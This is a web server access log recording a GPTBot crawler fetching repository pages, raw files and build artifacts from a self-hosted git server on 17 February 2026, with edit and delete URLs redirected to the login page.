[Length 9852] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:14:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11568] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:14:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11132] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:14:50:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:14:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10503] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:14:50:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:14:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/mail_contact.py" -[17/Feb/2026:14:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" [Client 74.7.227.38] [Length 10146] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:14:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71398] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" -[17/Feb/2026:14:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" -[17/Feb/2026:14:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" -[17/Feb/2026:14:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 9884] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" -[17/Feb/2026:14:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10661] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:14:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9941] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:14:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:14:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481684] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" -[17/Feb/2026:14:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659891] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" -[17/Feb/2026:14:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10858] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" -[17/Feb/2026:14:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10042] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:14:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:14:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" -[17/Feb/2026:14:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10699] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" -[17/Feb/2026:14:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode" -[17/Feb/2026:14:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11358] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" -[17/Feb/2026:14:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp.md" -[17/Feb/2026:14:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10396] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm" -[17/Feb/2026:14:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" [Client 74.7.227.38] [Length 10720] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:14:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9929] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" -[17/Feb/2026:14:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:50:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 10046] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:14:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 19281] [Gzip 8.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:14:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:14:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10877] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" -[17/Feb/2026:14:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10192] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" -[17/Feb/2026:14:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10418] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10165] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" -[17/Feb/2026:14:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" -[17/Feb/2026:14:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" -[17/Feb/2026:14:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11118] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" -[17/Feb/2026:14:51:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/mail_contact.py" -[17/Feb/2026:14:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/mail_contact.py" -[17/Feb/2026:14:51:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/mail_contact.py" -[17/Feb/2026:14:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/mail_contact.py" -[17/Feb/2026:14:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14161] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11878] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14728] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11304] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 